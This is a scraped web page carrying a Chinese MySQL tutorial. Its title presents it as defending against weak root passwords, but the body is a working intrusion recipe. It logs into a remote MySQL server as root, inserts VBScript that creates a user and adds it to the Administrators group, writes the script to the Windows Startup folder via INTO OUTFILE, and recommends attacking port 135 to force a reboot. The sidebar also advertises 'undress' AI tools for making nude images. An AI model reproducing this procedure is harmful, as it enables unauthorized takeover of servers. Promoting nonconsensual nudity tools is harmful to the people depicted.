Maison base de données tutoriel mysql 防止mysql用户root密码弱口令的攻击方法

防止mysql用户root密码弱口令的攻击方法

Jun 07, 2016 pm 05:51 PM
root

文章介绍关于防止mysql用户root密码弱口令的攻击,大家可以看看自己的mysql root是不是也存在这样的安全隐患。

1、连接到对方MYSQL 服务器

-u root -h 192.168.0.1

mysql.exe 这个程序在你安装了MYSQL的的BIN目录中。

2、让我们来看看服务器中有些什么

mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

mysql>use test; 我们将会进入test数据库中。

4、查看我们进入数据库中有些什么数据表

mysql>show tables; 默认的情况下,test中没有任何表的存在。

以下为关键的部分

5、在TEST数据库下创建一个新的表;

mysql>create table a (cmd text); 好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。

6、在表中插入内容

 代码如下 复制代码

mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

mysql>insert into a values

("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

注意双引号和括号以及后面的"0"一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!  7、好了,现在我们来看看表a中有些什么

mysql> * from a;我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步

8、输出表为一个VBS的脚本文件

mysql>select * from a into outfile "c:\docume~1\alluse~1\“开始”菜单\程序\启动\a.vbs"; 我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意""符号。

9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。

总结:不管你什么时候都需要注意自己服务器的安全否则就别谈其它应用程序了,本文章讲述的mysql root密码弱口令的攻击只是安全应用中的冰山一解而己。

Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Outils d'IA chauds

Undresser.AI Undress

Undresser.AI Undress

Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover

AI Clothes Remover

Outil d'IA en ligne pour supprimer les vêtements des photos.

Undress AI Tool

Undress AI Tool

Images de déshabillage gratuites

Clothoff.io

Clothoff.io

Dissolvant de vêtements AI

AI Hentai Generator

AI Hentai Generator

Générez AI Hentai gratuitement.

Article chaud

R.E.P.O. Crystals d'énergie expliqués et ce qu'ils font (cristal jaune)
3 Il y a quelques semaines By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Meilleurs paramètres graphiques
3 Il y a quelques semaines By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Comment réparer l'audio si vous n'entendez personne
3 Il y a quelques semaines By 尊渡假赌尊渡假赌尊渡假赌
Où trouver la courte de la grue à atomide atomique
1 Il y a quelques semaines By DDD

Outils chauds

Bloc-notes++7.3.1

Bloc-notes++7.3.1

Éditeur de code facile à utiliser et gratuit

SublimeText3 version chinoise

SublimeText3 version chinoise

Version chinoise, très simple à utiliser

Envoyer Studio 13.0.1

Envoyer Studio 13.0.1

Puissant environnement de développement intégré PHP

Dreamweaver CS6

Dreamweaver CS6

Outils de développement Web visuel

SublimeText3 version Mac

SublimeText3 version Mac

Logiciel d'édition de code au niveau de Dieu (SublimeText3)

Connectez-vous à Ubuntu en tant que superutilisateur Connectez-vous à Ubuntu en tant que superutilisateur Mar 20, 2024 am 10:55 AM

Dans les systèmes Ubuntu, l'utilisateur root est généralement désactivé. Pour activer l'utilisateur root, vous pouvez utiliser la commande passwd pour définir un mot de passe, puis utiliser la commande su- pour vous connecter en tant que root. L'utilisateur root est un utilisateur disposant de droits d'administration système illimités. Il dispose des autorisations nécessaires pour accéder et modifier les fichiers, la gestion des utilisateurs, l'installation et la suppression de logiciels et les modifications de la configuration du système. Il existe des différences évidentes entre l'utilisateur root et les utilisateurs ordinaires. L'utilisateur root possède la plus haute autorité et des droits de contrôle plus étendus sur le système. L'utilisateur root peut exécuter des commandes système importantes et modifier des fichiers système, ce que les utilisateurs ordinaires ne peuvent pas faire. Dans ce guide, j'explorerai l'utilisateur root Ubuntu, comment se connecter en tant que root et en quoi il diffère d'un utilisateur normal. Avis

Quelle est la différence entre les directives root et alias dans la configuration Nginx ? Quelle est la différence entre les directives root et alias dans la configuration Nginx ? May 12, 2023 pm 12:16 PM

La racine et l'alias peuvent être définis dans le module de localisation et sont utilisés pour spécifier le chemin réel de la ressource demandée, par exemple : location/i/{root/data/w3;} requêtes http://foofish.net/i /top.gif Lorsque cette adresse est utilisée, la ressource réelle correspondante sur le serveur est le fichier /data/w3/i/top.gif Remarque : Le chemin réel est la valeur spécifiée par root plus la valeur spécifiée par location. Et l'alias est comme son nom. Le chemin spécifié par l'alias est l'alias de l'emplacement. Quelle que soit la façon dont la valeur de l'emplacement est écrite, le chemin réel de la ressource est le chemin spécifié par l'alias, par exemple.

Étape par étape, utiliser Python pour supprimer les fichiers à long chemin sous Windows Étape par étape, utiliser Python pour supprimer les fichiers à long chemin sous Windows Apr 12, 2023 pm 01:31 PM

0x01 Contexte de l'article Récemment, le stockage d'un système métier de l'entreprise de l'auteur approche de la limite, et le serveur ne pourra bientôt plus fonctionner car le système métier A contient plusieurs sous-systèmes A1, A2, A3... An, au milieu de ces sous-systèmes. Pour des raisons de conception, les fichiers de stockage sont tous stockés dans le même répertoire parent. La seule différence est que les noms des fichiers et des dossiers générés par les différents sous-systèmes commencent par le nom du sous-système. Par exemple, les fichiers générés par le sous-système A1 sont tous nommés A1xxxxx​, et les noms de fichiers générés par le sous-système A2 sont tous A2xxxxx. Nous devons maintenant supprimer les fichiers historiques de certains de ces sous-systèmes pour libérer de l'espace sur le serveur. Des dizaines de téraoctets de données sont stockés ensemble. La suppression manuelle n'apparaîtra certainement pas. Nous ne pouvons utiliser que l'automatisation du programme.

Comment changer le nom d'utilisateur root sous Linux Comment changer le nom d'utilisateur root sous Linux May 18, 2023 pm 07:50 PM

1. En prenant CentOS comme exemple, après vous être connecté, modifiez /etc/passwd et /etc/shadow, remplacez la racine commençant sur la première ligne par un nouveau nom d'utilisateur (tel que admin) et enregistrez via wq ! 2. Après modification et enregistrement, cela prendra effet après le redémarrage du serveur. Vous pouvez vérifier les autorisations du fichier et voir que la colonne du compte est devenue admin, comme suit : Remarque : L'utilisateur par défaut avec l'autorité administrative la plus élevée sous Linux. est root, l'uid est 0. Seul l'uid est reconnu dans le système, donc tant que l'uid est égal à 0, le système est considéré comme l'utilisateur administratif le plus élevé. Cependant, certains problèmes peuvent survenir avec les applications. Certains logiciels utilisent l'utilisateur root par défaut, donc si vous avez une compréhension limitée des applications logicielles,

Avantages et inconvénients du rootage de votre téléphone Avantages et inconvénients du rootage de votre téléphone Jul 06, 2023 pm 04:53 PM

Les avantages de rooter votre téléphone : 1. Vous pouvez sauvegarder le système ; 2. Vous pouvez utiliser des programmes avancés ; 3. Vous pouvez modifier et supprimer des programmes système ; 4. Vous pouvez installer des programmes sur la carte SD ; polices système, etc. Inconvénients : 1. Une fois le téléphone mobile rooté, il est facile d'être envahi par des virus chevaux de Troie ; 2. Des dommages au système peuvent survenir en raison de problèmes d'incomplétude et de compatibilité logicielle. 3. Une fois le téléphone mobile rooté, le logiciel supprime par erreur les fichiers système ; , provoquant des erreurs système ; 4. Il existe un risque de fuite de la confidentialité des utilisateurs après le root du téléphone, etc.

Comment installer des programmes Linux sans autorisations root Comment installer des programmes Linux sans autorisations root Jan 13, 2024 pm 03:27 PM

Pour certaines machines partagées, nous ne disposons peut-être pas des autorisations root, il sera donc un peu difficile d'installer le programme. En fait, tant que les fichiers concernés sont placés dans leurs propres répertoires, les restrictions d'autorisation root peuvent être levées. J'ai installé Libevent sans autorisations root. Spécifiez simplement le chemin d'installation de mon répertoire /home via le préfixe : ./configure--prefix=/home/****/libevent--enable-sharedmakemakeinstallmakeverify#libevent test, other L'installation peut ne pas fonctionner. être disponible.

Comment définir le mot de passe pour root dans MySQL Comment définir le mot de passe pour root dans MySQL May 29, 2023 pm 01:22 PM

Étape 1 : Connectez-vous d'abord à MySQL et entrez la commande suivante dans le terminal pour accéder à la console MySQL : sudomysql Si vous êtes invité à saisir un mot de passe après avoir entré cette commande, veuillez saisir le mot de passe de votre utilisateur root. Étape 2 : Changer le mot de passe Après être entré dans la console MySQL, nous pouvons commencer à changer le mot de passe de l'utilisateur root. Définissez le mot de passe comme suit : ALTERUSER'root'@'localhost'IDENTIFIEDWITHmysql_native_passwordBY'new_password&am

Qu'est-ce que cela signifie que le téléphone actuel n'est pas rooté ? Qu'est-ce que cela signifie que le téléphone actuel n'est pas rooté ? Sep 19, 2023 pm 02:01 PM

Le téléphone mobile actuel n'est pas rooté, ce qui signifie que le système d'exploitation du téléphone mobile n'a pas obtenu les autorisations de super-utilisateur. Dans le système Android, l'autorisation root est l'autorisation la plus élevée, qui permet aux utilisateurs d'apporter des modifications en profondeur au système et d'accéder aux informations sensibles. fichiers système. Le téléphone est toujours dans l'état par défaut, aucune autorisation système n'a été modifiée, ce qui signifie que les utilisateurs ne peuvent pas accéder et modifier directement les fichiers système, et ne peuvent pas effectuer certaines opérations système avancées. fonctions de base du téléphone mobile et installer les applications normalement. Il y aura des restrictions dans certains scénarios spéciaux.

See all articles